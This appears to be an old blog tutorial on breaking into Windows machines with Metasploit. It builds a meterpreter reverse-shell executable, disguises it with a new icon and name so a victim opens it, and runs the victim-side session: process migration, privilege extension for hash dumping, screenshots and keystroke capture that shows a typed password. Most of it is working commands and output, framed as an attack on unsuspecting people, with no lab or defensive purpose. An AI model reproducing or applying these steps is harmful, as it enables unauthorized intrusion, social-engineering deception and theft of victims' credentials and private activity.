Hey, I'm going to show you step by step how to come in to windows system easily. I used Backtrack 4 in this situation, but you can also use windows if you wan't to. What we are going to use is: Metasploit and Nmap. Just follow the step.
Download Metasploit on this site you can use it on windows or linux.
Install the program.

If it is only local network use your local IP address, if is it over internet, use your WAN IP address, you can see it from

start terminal/shell on backtrack.

root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 x > /root/Payload.exe
Created by msfpayload (
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=,LPORT=4444

If you made the payload right, it will come like this, if dosent show like this, you did it wrong. The payload.exe file will be on your desktop. 

I suggest if you can download Icon Changer 3.8 and change the Icon and named something more interesting, then can you easily make somebody to open the file.
Download Icon Changer 3.8 here:

start metasploit, and choose your exploit and PAYLOAD. Do it like above.

root@bt:~# msfconsole

< metasploit >
  (__)    )
    ||--|| *

  =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 575 exploits - 290 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
  =[ svn r9959 updated 241 days ago (2010.08.05)

Warning: This copy of the Metasploit Framework was last updated 241 days ago.
  We recommend that you update the framework at least every other day.
  For information on updating your copy of Metasploit, please see:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) >

See wich options you have.

msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  --  --  --

Payload options (windows/meterpreter/reverse_tcp):

   Name  Current Setting  Required  Description
   ----  --  --  --
   EXITFUNC  process    yes  Exit technique: seh, thread, process
   LHOST    yes  The listen address
   LPORT  4444  yes  The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

We are going to use our Local IP address on this time. do that by open new terminal/shell.

root@bt:~# ifconfig
eth0  Link encap:Ethernet  HWaddr 00:0c:29:32:56:46
    inet addr:  Bcast:  Mask:
    inet6 addr: fe80::20c:29ff:fe32:5646/64 Scope:Link
    RX packets:43 errors:0 dropped:0 overruns:0 frame:0
    TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:5370 (5.3 KB)  TX bytes:1152 (1.1 KB)
    Interrupt:19 Base address:0x2000

Lets start to insert our IP and port. Let's get back to metasploit.

msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
LPORT => 4444

msf exploit(handler) > exploit

[*] Started reverse handler on 10.113.20

[*] Starting the payload handler...

Make someone to open the payload.exe I recommend to download Icon Changer 3.8 and change the payload.exe icon an rename it, and then you can send it to somebody. After they open the file will it be like this.

[*] Started reverse handler on
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to
[*] Meterpreter session 1 opened ( -> at 2011-04-03 22:44:14 -0200

meterpreter >

We are going to migrate with explorer.exe now. type ps to see targets services.

meterpreter > ps

Process list

PID   Name    Arch  Session  User  Path
---   ----    ----  --  ----  ----
0  [System Process]
4  System
356   smss.exe
444   csrss.exe
508   wininit.exe
520   csrss.exe
556   services.exe
572   lsass.exe
580   lsm.exe
704   svchost.exe
768   nvvsvc.exe
808   svchost.exe
868   svchost.exe
900   svchost.exe
928   svchost.exe
1068  svchost.exe
1144  DisplayLinkManager.exe
1176  winlogon.exe
1316  Smc.exe
1400  nvvsvc.exe
1476  svchost.exe
1548  ccSvcHst.exe
1708  spoolsv.exe
1720  DisplayLinkUserAgent.exe
1752  svchost.exe
1992  svchost.exe
2040  IPROSetMonitor.exe
464   LVPrcSrv.exe
408   mdm.exe
940   svchost.exe
1140  Rtvscan.exe
1448  TeamViewer_Service.exe
2068  UltiDevCassinWebServer2a.exe
2144  vmware-usbarbitrator.exe
2268  vmnat.exe
2324  vmnetdhcp.exe
2360  vmware-authd.exe
2848  svchost.exe
2916  svchost.exe
3460  taskhost.exe    x86   1  SERMERSOOQilin  C:Windowssystem32taskhost.exe
3528  dwm.exe  x86   1  SERMERSOOQilin  C:Windowssystem32Dwm.exe
[b] 3580  explorer.exe    x86   1  SERMERSOOQilin  C:WindowsExplorer.EXE[/b]
3740  DisplayLinkUI.exe  x86   1  SERMERSOOQilin  C:Program FilesDisplayLink Core SoftwareDisplayLinkUI.exe
4080  hqtray.exe    x86   1  SERMERSOOQilin  C:Program FilesVMwareVMware Playerhqtray.exe
2304  SmcGui.exe    x86   1
2084  AdobeARM.exe    x86   1  SERMERSOOQilin  C:Program FilesCommon FilesAdobeARM1.0AdobeARM.exe
2336  ccApp.exe  x86   1  SERMERSOOQilin  C:Program FilesCommon FilesSymantec SharedccApp.exe
2000  LWS.exe  x86   1  SERMERSOOQilin  C:Program FilesLogitechLogitech WebCam SoftwareLWS.exe
3832  PWRISOVM.EXE    x86   1  SERMERSOOQilin  C:Program FilesPowerISOPWRISOVM.EXE
4004  PrintScreen.exe  x86   1  SERMERSOOQilin  C:Program FilesGadwin SystemsPrintScreenPrintScreen.exe
1952  PRTG Windows GUI.exe    x86   1  SERMERSOOQilin  C:Program FilesPRTG Network MonitorPRTG Windows GUI.exe
1936  CUCore.exe    x86   1  SERMERSOOQilin  C:UsersilinAppDataLocalRadvisionConference Client7.10.1.169cucore.exe
2540  COCIManager.exe  x86   1  SERMERSOOQilin  C:Program FilesCommon FilesLogishrdLQCVFXCOCIManager.exe
4784  SearchIndexer.exe
2964  msnmsgr.exe  x86   1  SERMERSOOQilin  C:Program FilesWindows LiveMessengermsnmsgr.exe
6028  wlcomm.exe    x86   1  SERMERSOOQilin  C:Program FilesWindows LiveContactswlcomm.exe
5944  vmplayer.exe    x86   1  SERMERSOOQilin  C:Program FilesVMwareVMware Playervmplayer.exe
5096  firefox.exe  x86   1  SERMERSOOQilin  C:Program FilesMozilla Firefoxfirefox.exe
448   plugin-container.exe    x86   1  SERMERSOOQilin  C:Program FilesMozilla Firefoxplugin-container.exe
4488  vmware-vmx.exe
5200  Payload.exe  x86   1  SERMERSOOQilin  C:UsersilinDesktopPayload.exe
5696  notepad.exe  x86   1  SERMERSOOQilin  C:Windowssystem32notepad.exe

meterpreter > migrate 3580
[*] Migrating to 3580...
[*] Migration completed successfully.
meterpreter >

I typed use priv to open hashdump or other things. 

meterpreter > use priv
Loading extension priv...success.

type sysinfo to see wich system it is. Is it helpful?

meterpreter > sysinfo
Computer: NUUMOB0088
OS  : Windows 7 (Build 7600, ).
Arch    : x86
Language: da_DK
meterpreter >

Take screenshot of targets desktop, remember after you make screenshot, the file is on your desktop.

meterpreter > screenshot
Screenshot saved to: /root/qgYuVeTx.jpeg
meterpreter > /usr/lib/firefox-3.0.15/firefox: symbol lookup error: /usr/lib/xulrunner- undefined symbol: sqlite3_enable_shared_cache

meterpreter >

You kan scan/listen targets what ever det type, by this.

meterpreter > keyscan_dump
Dumping captured keystrokes...
<LWin> rnotepad <Return> my password it Hahahahaha <Alt>  <LMenu>  <Tab>
meterpreter >
don't wan't to wait for the host, you can just type the targets ip and port. My tutorials link is here

I have another thread if you
Enjoy it!
Rate this and make comments.

Is it too difficult to understand? If it is, I think I can make it more understandable ;D

No comments:

Post a Comment